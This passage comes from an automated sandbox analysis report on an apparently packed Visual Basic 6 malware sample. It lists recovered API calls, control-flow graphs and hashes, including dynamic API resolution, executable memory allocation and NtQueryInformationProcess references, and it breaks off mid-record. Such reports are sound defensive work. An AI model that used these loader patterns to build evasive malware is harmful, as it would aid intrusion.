                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054B9AD
                                                                    • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054B9C5
                                                                      • Part of subcall function 0054BC0E: #697.MSVBVM60(?,00000000,?,00000000,?,00000002,?), ref: 0054BCB3
                                                                      • Part of subcall function 0054BC0E: __vbaVarCat.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054BCCE
                                                                      • Part of subcall function 0054BC0E: __vbaVarMove.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054BCD8
                                                                      • Part of subcall function 0054BC0E: __vbaFreeVar.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054BCE0
                                                                      • Part of subcall function 0054BC0E: __vbaVarAdd.MSVBVM60(?,00000002,?), ref: 0054BD01
                                                                      • Part of subcall function 0054BC0E: __vbaVarMove.MSVBVM60(?,00000002,?), ref: 0054BD0B
                                                                    • __vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054B9E0
                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054B9EA
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054B9F2
                                                                    • __vbaNew2.MSVBVM60(00407D80,00000000,?,?,?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004), ref: 0054BA17
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A318,00000024,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054BA7B
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 0054BA8C
                                                                    • #644.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054BA94
                                                                    • #644.MSVBVM60(?,?), ref: 0054BAA1
                                                                    • #644.MSVBVM60(?,?,?,?), ref: 0054BACB
                                                                    • __vbaFreeVar.MSVBVM60(?,?,00000008,00000040,?,?,?,?), ref: 0054BAEB
                                                                    • __vbaFreeStr.MSVBVM60(0054BB19,?,?,00000008,00000040,?,?,?,?), ref: 0054BB03
                                                                    • __vbaFreeObj.MSVBVM60(0054BB19,?,?,00000008,00000040,?,?,?,?), ref: 0054BB0B
                                                                    • __vbaFreeStr.MSVBVM60(0054BB19,?,?,00000008,00000040,?,?,?,?), ref: 0054BB13
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$#644$Move$Chkstk$Addref$#697CastCheckHresultListLockNew2RedimUnlock
                                                                    • String ID: (W
                                                                    • API String ID: 1321261956-3555290937
                                                                    • Opcode ID: b6c6eb2702bfbbda5b92b88046f41cda3c4abfe0921baafd758e64ddd912d63f
                                                                    • Instruction ID: 7c570a3e52b83472e1cfa5a82856d6ac6d47bf30b0a6e393872b3b49ec2a7477
                                                                    • Opcode Fuzzy Hash: b6c6eb2702bfbbda5b92b88046f41cda3c4abfe0921baafd758e64ddd912d63f
                                                                    • Instruction Fuzzy Hash: 8C71E571D00208AFDB05EFA5C886ADDBBB5FF08344F10812AF605BB2A1DB75AA45DF54

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054CCD4,?,?), ref: 0054D429
                                                                    • __vbaVarAdd.MSVBVM60(?,00000002,?,?,00006011,?,?,?,?,00401006,?,?,?,0054CCD4,?,?), ref: 0054D49D
                                                                    • __vbaVarSub.MSVBVM60(?,00000002,00000000,?,00000002,?,?,00006011,?,?,?,?,00401006), ref: 0054D4AE
                                                                    • __vbaI4Var.MSVBVM60(00000000,?,00000002,00000000,?,00000002,?,?,00006011,?,?,?,?,00401006), ref: 0054D4B4
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,?,00000002,00000000,?,00000002,?,?,00006011,?,?,?,?), ref: 0054D4C6
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,?,?,?,00401006,?,?,?,0054CCD4,?,?), ref: 0054D4D7
                                                                    • #644.MSVBVM60(?,?,?,?,?,?,?,00401006,?,?,?,0054CCD4,?,?), ref: 0054D4ED
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,00401006,?,?,?,0054CCD4,?,?), ref: 0054D4FC
                                                                    • #644.MSVBVM60(?,?,?,?,?,?,?,?,?,00401006,?,?,?,0054CCD4,?,?), ref: 0054D505
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,?,00000000,?,?,?,?,?), ref: 0054D52C
                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 0054D53D
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,?), ref: 0054D549
                                                                    • __vbaSetSystemError.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?), ref: 0054D588
                                                                    • __vbaAryUnlock.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?), ref: 0054D591
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,?,?), ref: 0054D59A
                                                                    • __vbaVarMove.MSVBVM60 ref: 0054D5B5
                                                                    • __vbaVarTstEq.MSVBVM60(00008003,?), ref: 0054D5D8
                                                                      • Part of subcall function 0054D38A: __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054D466,?,00006011,?,?,?,?,00401006), ref: 0054D3A5
                                                                      • Part of subcall function 0054D38A: __vbaRefVarAry.MSVBVM60(?,?,?,?,?,00401006,?,?,?,0054D466,?,00006011,?,?,?,?), ref: 0054D3BA
                                                                      • Part of subcall function 0054D38A: __vbaUbound.MSVBVM60(00000001,00000000,?,?,?,?,?,00401006,?,?,?,0054D466,?,00006011), ref: 0054D3C3
                                                                      • Part of subcall function 0054D38A: __vbaVarMove.MSVBVM60(00000001,00000000,?,?,?,?,?,00401006,?,?,?,0054D466,?,00006011), ref: 0054D3D8
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00008003,?), ref: 0054D5FD
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0054D60E
                                                                    • #644.MSVBVM60(?,?,?,?,?,?,?,?,?,?), ref: 0054D624
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?), ref: 0054D633
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054D63F
                                                                    • #644.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054D655
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054D664
                                                                    • __vbaFreeVar.MSVBVM60(0054D6C6,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054D6B5
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0054D6C6,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054D6C0
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$LockUnlock$#644$ChkstkFreeMoveRedim$DestructErrorListSystemUbound
                                                                    • String ID:
                                                                    • API String ID: 1237311878-0
                                                                    • Opcode ID: 8a32db7512c84d52d412204c616b1e5f1e0d4bab683cffa1ec6c606ee03054a5
                                                                    • Instruction ID: 053b77a965dbc5b437b3a9dd948ecb9a9d2adb8cc955567b521ce4529cd9e3f4
                                                                    • Opcode Fuzzy Hash: 8a32db7512c84d52d412204c616b1e5f1e0d4bab683cffa1ec6c606ee03054a5
                                                                    • Instruction Fuzzy Hash: 8F81CAB1D00208AFDF14EFE5D845FDEBBB8AF08304F44416AF604EB291DA79A9448B64

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054C245
                                                                      • Part of subcall function 0054C16A: __vbaChkstk.MSVBVM60(?,0054BB64,0054B8E6,?,00000008,?,00000000,00401006,?,?,?,0054B849,00000000,-00000004,00000000,00000000), ref: 0054C170
                                                                    • #644.MSVBVM60(?,00574C83,?,?,?,?,00401006), ref: 0054C26E
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,?,00000000,00000004,?,00574C83,?,?,?,?,00401006), ref: 0054C294
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00000000,?,00003000,00000040,?,00000000,00000004,?,00574C83), ref: 0054C2B2
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,00574C83,?,?,?,?,00401006), ref: 0054C2C1
                                                                    • #644.MSVBVM60(?,?,?,?,00574C83,?,?,?,?,00401006), ref: 0054C2D7
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,00574C83,?,?,?,?,00401006), ref: 0054C2E3
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,-00000004,?,?,?,?,?,?,00574C83,?,?,?,?,00401006), ref: 0054C306
                                                                    • #644.MSVBVM60(?,?,?,?,-00000004,?,?,?,?,?,?,00574C83), ref: 0054C31C
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,-00000004,?,?,?,?,?,?,00574C83), ref: 0054C328
                                                                      • Part of subcall function 0054C182: __vbaChkstk.MSVBVM60(?,00401006), ref: 0054C19E
                                                                      • Part of subcall function 0054C182: __vbaVarVargNofree.MSVBVM60(?,?,?,?,00401006), ref: 0054C1B6
                                                                      • Part of subcall function 0054C182: __vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,00401006), ref: 0054C1C0
                                                                      • Part of subcall function 0054C182: #644.MSVBVM60(00000000,?,00000000,?,?,?,?,00401006), ref: 0054C1C6
                                                                      • Part of subcall function 0054C182: __vbaVarMove.MSVBVM60 ref: 0054C1DB
                                                                      • Part of subcall function 0054C182: __vbaFreeStr.MSVBVM60 ref: 0054C1E3
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,00401006,?,?,?,?,?,?,?,?,-00000004,?,?,?), ref: 0054C350
                                                                    • #644.MSVBVM60(?,?,?,?,00401006,?,?,?,?,?,?,?,?,-00000004,?,?), ref: 0054C366
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,00401006,?,?,?,?,?,?,?,?,-00000004,?), ref: 0054C372
                                                                    • __vbaI4Var.MSVBVM60(?,?,00000000,?,?,?,?,?,?,00401006,?,?,?,?,?,?), ref: 0054C38E
                                                                    • __vbaVarMove.MSVBVM60(?,00000000,?,?,00000000,?,?,?,?,?,?,00401006,?,?,?), ref: 0054C3AC
                                                                    • __vbaFreeVar.MSVBVM60(?,00000000,?,?,00000000,?,?,?,?,?,?,00401006,?,?,?), ref: 0054C3B4
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0054C3F0,?,00000000,?,?,00000000,?,?,?,?,?,?,00401006,?), ref: 0054C3EA
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#644$ChkstkLockUnlock$FreeMove$AllocDestructNofreeRedimVargVirtual
                                                                    • String ID:
                                                                    • API String ID: 2337634516-0
                                                                    • Opcode ID: fe4744becb7c43a6024cf9ef51b26448234b5e3c6d42dd275823909d6c6a20f8
                                                                    • Instruction ID: 18d491bce09d1c8318c8c6602eb692ffcc5bab5d7e6f6830f44a0ad0d67cc42b
                                                                    • Opcode Fuzzy Hash: fe4744becb7c43a6024cf9ef51b26448234b5e3c6d42dd275823909d6c6a20f8
                                                                    • Instruction Fuzzy Hash: A4510971D00109AFDF05EFE4DD86EEEBBB9EF08704F00402AB600FB2A1D679A9049B54

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 838 57c48c-57c4ca __vbaChkstk call 549601 * 2 843 57c4e4 838->843 844 57c4cc-57c4e2 __vbaNew2 838->844 845 57c4eb-57c548 __vbaChkstk * 2 843->845 844->845 847 57c564 845->847 848 57c54a-57c562 __vbaHresultCheckObj 845->848 849 57c568-57c56f 847->849 848->849 850 57c571-57c587 __vbaNew2 849->850 851 57c589 849->851 852 57c590-57c59f 850->852 851->852 853 57c5a1-57c5b7 __vbaNew2 852->853 854 57c5b9 852->854 855 57c5c0-57c5e3 __vbaObjSetAddref 853->855 854->855 857 57c5e5-57c5fa __vbaHresultCheckObj 855->857 858 57c5fc 855->858 859 57c600-57c608 __vbaFreeObj call 57c62d 857->859 858->859 861 57c60d-57c61d 859->861
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401006,?,?,?,0054F443,?,?,?,?,00401006), ref: 0057C4A7
                                                                    • __vbaNew2.MSVBVM60(00407E7C,0057F300,?,?,?,00000000,00401006,?,?,?,0054F443), ref: 0057C4D6
                                                                    • __vbaChkstk.MSVBVM60 ref: 0057C512
                                                                    • __vbaChkstk.MSVBVM60 ref: 0057C523
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0A4,000002B0), ref: 0057C55A
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40), ref: 0057C57B
                                                                    • __vbaNew2.MSVBVM60(00407E7C,0057F300), ref: 0057C5AB
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0057C5C9
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000010), ref: 0057C5F2
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,0040B18C,00000010), ref: 0057C603
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$ChkstkNew2$CheckHresult$AddrefFree
                                                                    • String ID:
                                                                    • API String ID: 2042159070-0
                                                                    • Opcode ID: 03e4d349cefd3b7456e8383648be50925100c7adc039a99b0371d7bd30ae0747
                                                                    • Instruction ID: 51267228dea3d4fa9433370c28803a481124c2a53951b14cb8ce981e22db26c1
                                                                    • Opcode Fuzzy Hash: 03e4d349cefd3b7456e8383648be50925100c7adc039a99b0371d7bd30ae0747
                                                                    • Instruction Fuzzy Hash: 3D41E8B0D00208AFCF11DF95E84AB9DBFB5BF09744F20882AF5057B2A1C7B96944AF55

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 903 57c415-57c453 __vbaChkstk call 40a920 905 57c458-57c46d __vbaSetSystemError 903->905
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054AE1C,?,?,?,?,?,?,00401006), ref: 0057C430
                                                                    • __vbaSetSystemError.MSVBVM60(000000FF,00000022,00000030,00000004,?,?,?,?,00401006), ref: 0057C458
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$ChkstkErrorSystem
                                                                    • String ID: 0
                                                                    • API String ID: 2242893769-4108050209
                                                                    • Opcode ID: 1ba3a2e77a620536724e8bb11261e482320ce497bd618bf7ecea5ca62d31250e
                                                                    • Instruction ID: 6a22bd2479765c9ce26099b9049d4de8f1463c197106a029657e891474b767b8
                                                                    • Opcode Fuzzy Hash: 1ba3a2e77a620536724e8bb11261e482320ce497bd618bf7ecea5ca62d31250e
                                                                    • Instruction Fuzzy Hash: D8E09BB1540348BBDB10DBD5CD07F9A7EACE708F68F60455EF110765D0C2B96D005669
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054ADBB
                                                                      • Part of subcall function 0057C3B4: __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054AE06,?,?,?,?,?,00401006), ref: 0057C3CF
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,00401006), ref: 0054AE09
                                                                      • Part of subcall function 0054AF1D: __vbaChkstk.MSVBVM60(00000000,00401006,?,?,?,0054AE13,?,?,?,?,?,00401006), ref: 0054AF3A
                                                                      • Part of subcall function 0054AF1D: __vbaStrCat.MSVBVM60(0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF56
                                                                      • Part of subcall function 0054AF1D: __vbaStrMove.MSVBVM60(0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF60
                                                                      • Part of subcall function 0054AF1D: __vbaStrCat.MSVBVM60(bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF6B
                                                                      • Part of subcall function 0054AF1D: __vbaStrMove.MSVBVM60(bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF75
                                                                      • Part of subcall function 0054AF1D: __vbaStrCat.MSVBVM60(0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF80
                                                                      • Part of subcall function 0054AF1D: __vbaStrMove.MSVBVM60(0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF8A
                                                                      • Part of subcall function 0054AF1D: #644.MSVBVM60(00000000,0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13), ref: 0054AF90
                                                                      • Part of subcall function 0054AF1D: GetModuleHandleW.KERNEL32(00000000,00000000,0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006), ref: 0054AF96
                                                                      • Part of subcall function 0054AF1D: __vbaFreeStrList.MSVBVM60(00000003,?,00401006,00000000,00000000,00000000,0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000), ref: 0054AFAE
                                                                      • Part of subcall function 0054AF1D: __vbaChkstk.MSVBVM60 ref: 0054AFCD
                                                                      • Part of subcall function 0054AF1D: __vbaStrVarVal.MSVBVM60(?,?,?), ref: 0054AFEF
                                                                      • Part of subcall function 0054AF1D: __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?), ref: 0054AFF9
                                                                      • Part of subcall function 0054AF1D: GetProcAddress.KERNEL32(00000000,?), ref: 0054B005
                                                                      • Part of subcall function 0054AF1D: __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,?,?), ref: 0054B019
                                                                      • Part of subcall function 0054AF1D: __vbaFreeVar.MSVBVM60 ref: 0054B024
                                                                      • Part of subcall function 0054AF1D: __vbaStrCat.MSVBVM60(0040A208,0040A1FC), ref: 0054B033
                                                                      • Part of subcall function 0054AF1D: __vbaStrMove.MSVBVM60(0040A208,0040A1FC), ref: 0054B03D
                                                                      • Part of subcall function 0054AF1D: __vbaStrCat.MSVBVM60(0040A218,00000000,0040A208,0040A1FC), ref: 0054B048
                                                                      • Part of subcall function 0054AF1D: __vbaStrMove.MSVBVM60(0040A218,00000000,0040A208,0040A1FC), ref: 0054B052
                                                                      • Part of subcall function 0054AF1D: __vbaStrCat.MSVBVM60(0040A22C,00000000,0040A218,00000000,0040A208,0040A1FC), ref: 0054B05D
                                                                      • Part of subcall function 0057C415: __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054AE1C,?,?,?,?,?,?,00401006), ref: 0057C430
                                                                      • Part of subcall function 0057C415: __vbaSetSystemError.MSVBVM60(000000FF,00000022,00000030,00000004,?,?,?,?,00401006), ref: 0057C458
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401006), ref: 0054AE1F
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$ChkstkFreeMove$List$#644AddressAnsiErrorHandleModuleProcSystem
                                                                    • String ID:
                                                                    • API String ID: 1084042792-0
                                                                    • Opcode ID: 09cc610a7555717751e5acb10b70b89146f4dccad5b3eb86fb52656cdc542a79
                                                                    • Instruction ID: 815d1665ba970f0d95d1afb21f17fedd6c7ccd0d38fb285ecba0fd914f6b1051
                                                                    • Opcode Fuzzy Hash: 09cc610a7555717751e5acb10b70b89146f4dccad5b3eb86fb52656cdc542a79
                                                                    • Instruction Fuzzy Hash: 2A014C71800208ABCB00EFA4C98BBCDBFB8FF48748F508469F404AB152C739AA148F95
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054F410
                                                                      • Part of subcall function 0057C48C: __vbaChkstk.MSVBVM60(00000000,00401006,?,?,?,0054F443,?,?,?,?,00401006), ref: 0057C4A7
                                                                      • Part of subcall function 0057C48C: __vbaNew2.MSVBVM60(00407E7C,0057F300,?,?,?,00000000,00401006,?,?,?,0054F443), ref: 0057C4D6
                                                                      • Part of subcall function 0057C48C: __vbaChkstk.MSVBVM60 ref: 0057C512
                                                                      • Part of subcall function 0057C48C: __vbaChkstk.MSVBVM60 ref: 0057C523
                                                                      • Part of subcall function 0057C48C: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0A4,000002B0), ref: 0057C55A
                                                                      • Part of subcall function 0057C48C: __vbaNew2.MSVBVM60(0040B19C,0057FB40), ref: 0057C57B
                                                                      • Part of subcall function 0057C48C: __vbaNew2.MSVBVM60(00407E7C,0057F300), ref: 0057C5AB
                                                                      • Part of subcall function 0057C48C: __vbaObjSetAddref.MSVBVM60(?,?), ref: 0057C5C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Chkstk$New2$AddrefCheckHresult
                                                                    • String ID:
                                                                    • API String ID: 1889392896-0
                                                                    • Opcode ID: 0a8f0a6e4697301072b03498af77774bbd72f2b8c467dc61e3250ae4979938e8
                                                                    • Instruction ID: 3178a8562f5cd90d1ff6d505fe2dafbddede7e7d9f637ebc3c7ac210ab2edec4
                                                                    • Opcode Fuzzy Hash: 0a8f0a6e4697301072b03498af77774bbd72f2b8c467dc61e3250ae4979938e8
                                                                    • Instruction Fuzzy Hash: 5E01E875A00648EFCB11DF58D946B8DBFF4FB44794F108465F809DB660C335AA40DB94
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054AE06,?,?,?,?,?,00401006), ref: 0057C3CF
                                                                      • Part of subcall function 0054A57F: NtAllocateVirtualMemory.NTDLL(000000FF,00000100,00000000,00000100,00003000,00000040,?,NtQueryInformationProcess,005492E3,?,NtQueryInformationProcess,005492FD,?,NtQueryInformationProcess,005492CC,NtQueryInformationProcess), ref: 0054A616
                                                                    Memory Dump Source
